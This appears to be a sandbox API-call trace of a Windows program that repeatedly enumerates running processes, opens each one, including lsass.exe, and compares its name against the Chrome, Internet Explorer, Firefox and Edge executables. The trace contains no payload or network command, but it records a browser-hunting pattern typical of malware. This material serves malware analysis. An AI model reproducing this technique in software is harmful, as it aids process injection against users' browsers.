	[0243.615] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.616] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.617] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x8d04
	[0243.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.617] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.617] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.618] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.618] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.618] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8d08
	[0243.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.619] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.620] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.620] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.621] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.621] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0243.622] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8d0c
	[0243.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.622] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0243.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.622] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.623] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0243.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.623] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.623] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.624] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8d10
	[0243.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.624] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.624] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.625] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.625] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.625] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x8d14
	[0243.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.627] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.627] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.627] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.628] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.628] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0243.629] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8d18
	[0243.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.629] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0243.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.629] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.629] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0243.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.630] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.630] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0243.630] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8d1c
	[0243.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.631] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.631] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.631] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.632] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.632] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0243.633] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8d20
	[0243.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.633] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0243.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.633] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.633] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0243.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.633] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.634] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.634] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8d24
	[0243.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.634] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.635] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.635] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.635] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.636] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0243.636] CloseHandle (hObject=0x4fd0) returned 1
	[0243.636] Sleep (dwMilliseconds=0x64) 
	[0243.738] GetCurrentProcessId () returned 0x110
	[0243.738] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0243.745] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0243.746] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0243.747] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0243.748] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8d28
	[0243.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.749] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0243.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.749] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.749] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0243.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.750] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.750] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0243.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8d2c
	[0243.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.751] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0243.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.752] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.752] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0243.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.753] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.753] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0243.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8d30
	[0243.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.754] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0243.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.754] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.755] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0243.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.755] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.755] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0243.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8d34
	[0243.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.756] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0243.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.757] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.757] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0243.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.757] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.758] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0243.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8d38
	[0243.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.759] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0243.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.759] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.759] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0243.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.760] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.760] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0243.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8d3c
	[0243.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.761] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0243.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.761] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.762] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0243.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.762] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.762] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0243.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8d40
	[0243.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.763] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0243.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.763] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.764] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0243.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.764] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0243.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8d44
	[0243.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.765] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0243.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.765] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.766] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0243.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.766] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8d48
	[0243.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.768] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.768] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.768] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.769] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.769] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8d4c
	[0243.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.770] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.770] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.770] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.771] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.771] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.772] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8d50
	[0243.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.773] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.774] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.774] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.775] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.775] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8d54
	[0243.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.776] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.776] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.776] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.777] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.777] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8d58
	[0243.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.778] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.779] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.779] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.779] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.780] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.780] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8d5c
	[0243.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.781] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.781] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.781] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.782] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.782] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8d60
	[0243.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.783] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
